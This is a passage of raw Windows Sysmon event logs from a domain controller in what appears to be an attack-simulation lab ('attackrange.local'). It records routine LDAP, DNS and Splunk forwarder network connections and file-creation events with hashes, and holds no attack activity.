14:08:17.574{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60722-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002203730Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.569{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60721-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 354300x80000000000000002203729Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.569{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60721-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local389ldap 23542300x80000000000000002203728Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:21.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4C12933572E574B39F9AEB2D2975B5,SHA256=6310F21153D503BB698C9D064E430D5157F930BDFDB7D4A83ABF9B361D970CD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203734Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:22.237{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9FD323522190A56ECA6C2CDD5F696411,SHA256=CF2F1D2457BBBCEDB9C29844E49859C4D75E3328A34D6418351FBD7D3DD45783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203733Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:22.096{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=423F70213CBDA45C770016A734E71F7F,SHA256=AD2CC5A2BD9D342C91FAC752CEF98894C0E00A50CA8E14C60B888E08CB9E3797,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203735Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:23.096{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE65C476DF3DB5546F9FEDDD661683EE,SHA256=0CB360C683B0D9DEEB3AFA5134B11FC46A7D81BE52FBE70A2F8A46A1FEB0C7E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203738Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:21.042{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60723-false10.0.1.12-8000- 23542300x80000000000000002203737Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:24.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EEC536746811ABE359D1C9B6D4843F1,SHA256=CCCFB1A82252CA9643796D8EB90C2A0C2971EA9E9ACED001DD49BF7A52EA6A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203736Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:24.127{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F82EB8934FE25A0393EDC23CA74E1C,SHA256=4286C2C5CC1B39A644A7B003F5FC5B3B36CE8C4E77CEEC23F3327FB0CEF70262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203739Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:25.143{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1495A9F6597372E7AED76BF9840EC3E,SHA256=B170385C780A375F5ECDB38FB48665B7486FAF84DEEC6BD5A772CE46B5A5ADE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203741Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:21.434{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-62911-true2001:500:200:0:0:0:0:bb.root-servers.net53domain 23542300x80000000000000002203740Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:26.144{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A160AC8941C2656E5F362C220C04B0BE,SHA256=2411F2DC9C87ED0EBFEAF74135DD53E94CC22721C4AA58EB7BF36B5B4B87F10F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203742Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:27.144{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F142FA531E7E30DDAEE4D47840DF281B,SHA256=964BFA80ABCBBDCC096CAEC993DC9B43C6DC06F27C1090379717FF6715007EC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203745Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:25.417{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local56331- 23542300x80000000000000002203744Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:28.599{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BCBFF606B72BDB81EC4997D539B78F6,SHA256=7A18B6A417E2860D6A014B0D5D1B13F70B3CADECD421DD3C56A17D373D13D5E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203743Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:28.162{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35236C884B60ED4CCC2A34539C84FF79,SHA256=39B589D19E35E20FFCA089482029CF52B751B65E40727509A8D917A6B6D77295,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203747Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:26.419{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-56331- 23542300x80000000000000002203746Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:29.193{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F28C0D87AFE7125D85435FD7324F72E,SHA256=A72E98FF266B256F87CE7895CCE1089BCA171E41D1F293F2A46D54ADB13A7BDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203750Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:26.857{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60724-false10.0.1.12-8000- 23542300x80000000000000002203749Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:30.212{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD4591BF5B1FAD86C9A8A5B1803FAB8F,SHA256=B6D308531E38A0F7FD911FC135B70561D61E36AF5E77AF6BB43604AB4E53AD57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203748Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:30.024{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03D04EA65F7DC8A84B2ADB09D954BCB2,SHA256=1D7728C74CFB2AD925739AB6149871E42B4440F0FB61842AC377DA758050E204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203751Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:31.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77FD1E570F85751A1C41EA518FF6DEE3,SHA256=734BD64BBFE74DF642C2EA2A4B4A73B9D28FBCD83BC11FDB9AFA6B3122245D08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203752Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:32.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4970A0347CBB40B0772700949129CB6B,SHA256=D08BFF4429EA9192828FEF20098F85577E920E4340DCEF738BA73DE35CC70365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203753Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:33.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B6D1CDB694BB0F8253EC5BB24ADBC66,SHA256=98EDFDDFF6B4B84A1B4786DCEB347FD751D6E6BB36F7DF84D43A4149EFB05CE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203755Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:34.259{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F770473B1571070A1C14476FAB03969D,SHA256=5538FD6AD1DE218FBBAA0481431C893714AB3D9168E8899863835CDA73363C06,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203754Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:29.641{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-52084-true2001:503:ba3e:0:0:0:2:30a.root-servers.net53domain 354300x80000000000000002203759Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:31.876{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60725-false10.0.1.12-8000- 23542300x80000000000000002203758Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:35.274{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2F20472F42C255443A1C9D813BDA857,SHA256=5FA1C620B43DC2D9CB71DDBABC3CF48021401F2D0BC1ACE457F4787E95C1767C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203757Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:35.071{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21F36B6C1893C5E53381BE51920C3549,SHA256=5C083572B6115E87976AD5895B4D6750042AA683E38E88A577E451EEB7251F80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203756Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:35.071{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52F5ABF6A6F0A06B9B1E49C921AB82CA,SHA256=BB6364ED459375FFE72AD56A6DAF4A94A6E39D98A7F2FD8F99351AAC4DF3D6F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203761Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:36.602{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21F36B6C1893C5E53381BE51920C3549,SHA256=5C083572B6115E87976AD5895B4D6750042AA683E38E88A577E451EEB7251F80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203760Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:36.274{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B98AEDD23A239E7D2B818F8D5D81FBB,SHA256=C518760187F0F9E3749D041D609B8F73424BE3106785CD95E731843DF9B48908,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203762Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:37.290{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21E5AA1BD64498DCDE89564C8BD9B57,SHA256=A02B1BBB3C22FC740765F94DD1829881D7AB22C9D398460179C4B86711A2844D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203764Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:38.587{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=099E00FFFE5BE57D27B2FDA4DD3A7C6B,SHA256=2E9A6BC55EA67B72416FFDD2AD7252A54EE8FA866F003415936E2877A0037752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203763Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:38.305{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717FA84549469C83FD36261E25AC7359,SHA256=FDD70C520A36D3E1F954D128406B5893AF88068212FCBAC0C8D6D6284797AB08,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203767Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:35.446{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51720-true2001:500:1:0:0:0:0:53h.root-servers.net53domain 23542300x80000000000000002203766Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:39.602{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CF742B9E05340C70D1F8FB9ADEB9FA8,SHA256=68EA7AFB5D06CDD0F3ECC0BD2F7420082ED6CE7D1F44D7E88D68D5DB729233E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203765Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:39.321{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243354E49E163D0A2CF334F7B538AC3E,SHA256=429D03B66112613FCCDF430D34C3F2C4AE2B7C83B4DC42FDBD53579D4009D89A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203769Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:36.907{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60726-false10.0.1.12-8000- 23542300x80000000000000002203768Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:40.352{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C03E016AA12AFB50BA4E2BA7CE503198,SHA256=3E794670D37B8E3613EC8392636127C2F5C828F206AC753B874D8C09CF6AA387,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203771Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:41.368{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=593DD9917780C1B2D736B3A724F844ED,SHA256=B38203D6691D659E87E72E62F5FA710B89B9E2BB83A4D42741B08F3ACB716831,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203770Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:41.337{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35361A62C85A3B18964B8FC32015F6A3,SHA256=C59E9F4C3479C978027CC243429A1A5A1F6980A99210FB5D0FD1222BF86E1C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203772Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:42.384{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A776D13942EE283DDB8C076C21EE26CE,SHA256=D792109C1CA0FFA5EE0467A1DA31CCCB1D01B6161F0AE903B670295FFE742903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203773Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:43.415{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7AB6C2D9DD189A5E05FDCD3B8CB8A71,SHA256=B7657EC7FDBD1F0567249862CED0DB5AC58DDC059DD390E715E122F037B0BE25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203774Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:44.430{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19FF8D7D6163B51BC9469E5538382E6E,SHA256=DBC2FC6AE39E6B32EDCA248D18491EDD7F62CE225C4AA5A64E9577ED4FDCE987,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203776Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:45.493{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=535574C793CF30D4B054CFD0950788AB,SHA256=36330174EB22A18757D6D4437D1A3A22A22B263A87E49F970DCE75C5A6DC0C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203775Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:45.102{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D87FBE99DA0330A0D5FAAFA8088B182,SHA256=2E1998B88806068E28D0879A328091A2E9B552929DB5925D243E7A376D1842B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203779Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:46.665{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CF793442CA8BCBBFFD7A98614C906DC,SHA256=44EB616AE8598EBC40C419631F050E22C80776398F9D741A6D386074713E6AF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203778Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:46.509{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2F28665F79342F9403E5859C7670E27,SHA256=E8BC42AFB1F4628A297C7FB77ED24CFE37127C38C8DFFCF49463E0C820F83260,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203777Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:41.939{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60728-false10.0.1.12-8000- 23542300x80000000000000002203780Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:47.540{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFC3C743B1C6F79C75ADDF6058EBDD7A,SHA256=E1F07B7039B70BA0C74E6996CC8F35CE56DC02A1B443699F211D71E77B09184E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203781Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:48.540{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E968F405C489F21F1A9903945A8F5985,SHA256=DD3C55A3AC3DF87E3DB322872F2E7F11917000FAEAD46C1907F0A8BC2323584D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203782Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:49.634{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4ECFB0D09618312CAC10153290C3676,SHA256=7544326608FA9A722E5E00E5679550839DD2E069F11ECD10DEF6C00DE264B410,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203783Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:50.634{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 